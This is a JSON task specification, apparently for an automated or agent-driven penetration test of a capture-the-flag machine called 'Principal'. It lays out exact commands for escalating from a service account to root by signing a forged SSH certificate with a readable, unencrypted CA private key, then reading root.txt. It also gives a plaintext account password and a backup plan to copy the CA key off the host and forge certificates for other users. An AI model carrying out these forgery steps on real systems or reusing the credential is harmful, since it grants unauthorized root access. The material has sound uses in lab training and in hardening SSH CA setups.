{
  "operation": "Principal",
  "timestamp": "2026-03-24T20:29:00Z",
  "phase": "EXPLOITATION",
  "elliot_authorized": true,
  "scope": {
    "objective": "Escalate from svc-deploy to root via SSH CA certificate forgery. Read root.txt.",
    "in_scope": [
      "Generate SSH keypair on target",
      "Sign public key with CA private key at /opt/principal/ssh/ca (principal=root)",
      "SSH as root using forged certificate",
      "Read root.txt"
    ],
    "out_of_scope": "Lateral movement, modifying SSH config, persistence, touching other hosts",
    "stop_conditions": [
      "root.txt captured",
      "CA key not usable for signing (permissions changed, encrypted)",
      "Turn budget exhausted"
    ],
    "max_attempts_per_path": 2,
    "max_turns": 8
  },
  "context_files": [
    "../shared/attack_surface.md",
    "../shared/noire_findings.md"
  ],
  "primary_path": "SSH CA cert forgery: 1) ssh-keygen -t ed25519 -f /tmp/pwn -N \"\" 2) ssh-keygen -s /opt/principal/ssh/ca -I root-cert -n root -V +1h /tmp/pwn.pub 3) ssh -i /tmp/pwn -o CertificateFile=/tmp/pwn-cert.pub root@localhost (or root@10.129.244.220). Then cat /root/root.txt.",
  "backup_path": "If cert signing fails on target, download the CA key to Kali, sign locally, then SSH with cert from Kali. If root login is blocked even with cert, try forging cert for other users (admin, jthompson, amorales) who may have sudo.",
  "vulnerability_primitive": {
    "primitive": "Readable SSH CA private key + no AuthorizedPrincipalsFile = forge certificate for any user including root",
    "delivery_forms": [
      "Sign on target with ssh-keygen -s (primary — simplest)",
      "Download CA key to Kali, sign locally, SSH from Kali"
    ],
    "defenses_observed": "PermitRootLogin prohibit-password (allows cert, blocks password). No AuthorizedPrincipalsFile.",
    "untested_forms": [
      "Sign on target (primary)",
      "Sign on Kali (backup)"
    ]
  },
  "complexity": "trivial",
  "process_model": {
    "foreground": "SSH session as svc-deploy, then SSH as root",
    "background": "none",
    "critical_note": "Use -V +1h for cert validity. Sign on the target itself to avoid key transfer."
  },
  "notes": "PRIVESC DEPLOYMENT — Session 3.\n\nAccess: SSH as svc-deploy / D3pl0y_$$H_Now42!\n\nThe CA private key is at /opt/principal/ssh/ca (rw-r----- root:deployers, RSA 4096, unencrypted). svc-deploy can read it via deployers group.\n\nsshd config (60-principal.conf):\n  PubkeyAuthentication yes\n  PasswordAuthentication yes\n  PermitRootLogin prohibit-password\n  TrustedUserCAKeys /opt/principal/ssh/ca.pub\n\nNo AuthorizedPrincipalsFile is set — OpenSSH accepts any cert principal matching the target login username.\n\nExact commands:\n  ssh-keygen -t ed25519 -f /tmp/pwn -N \"\"\n  ssh-keygen -s /opt/principal/ssh/ca -I root-cert -n root -V +1h /tmp/pwn.pub\n  ssh -i /tmp/pwn -o CertificateFile=/tmp/pwn-cert.pub root@localhost\n  cat /root/root.txt"
}
